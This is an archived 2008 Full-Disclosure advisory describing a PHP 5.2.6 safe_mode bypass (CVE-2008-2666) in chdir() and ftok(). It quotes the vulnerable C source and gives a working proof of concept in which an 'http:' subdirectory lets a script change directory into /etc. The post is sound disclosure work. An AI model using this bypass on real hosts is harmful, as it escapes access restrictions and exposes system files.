| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <eb18cc29b720905de3e500960bc63822.qmail@home.pl>
Date: Wed, 18 Jun 2008 20:06:31 +0200
From: "Maksymilian Arciemowicz" <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PHP 5.2.6 chdir(),
ftok() (standard ext) safe_mode bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008
SecurityReason Research
SecurityAlert Id: 55
CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
chdir ? Change directory
SYNOPSIS:
bool chdir ( string $directory )
http://pl.php.net/manual/en/function.chdir.php
ftok ? Convert a pathname and a project identifier to a System V IPC key
SYNOPSIS:
int ftok ( string $pathname , string $proj )
http://pl.php.net/manual/en/function.ftok.php
!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS
- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's see to chdir() function
- ---
PHP_FUNCTION(chdir)
{
char *str;
int ret, str_len;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
RETURN_FALSE;
}
if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
RETURN_FALSE;
}
ret = VCWD_CHDIR(str);
if (ret != 0) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
RETURN_FALSE;
}
RETURN_TRUE;
}
- ---
str is beeing checked by safe_mode
example:
- ---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
- ---
in current directory, we should create subdir "http:". => it is possible to create chdir("http://../../../../../../")
and we are in /
Why?
TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)))
for
str="http://../../../../../../"
safe_mode will ignore all paths with http://
that same situation with ftok() function (and more)
- ---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
- ---/EXAMPLE1---
- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---
!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LISTS ALL VULNERABLE FUNCTIONS
- --- 2. How to fix ---
Do not use safe_mode as a main safety
- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)
iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists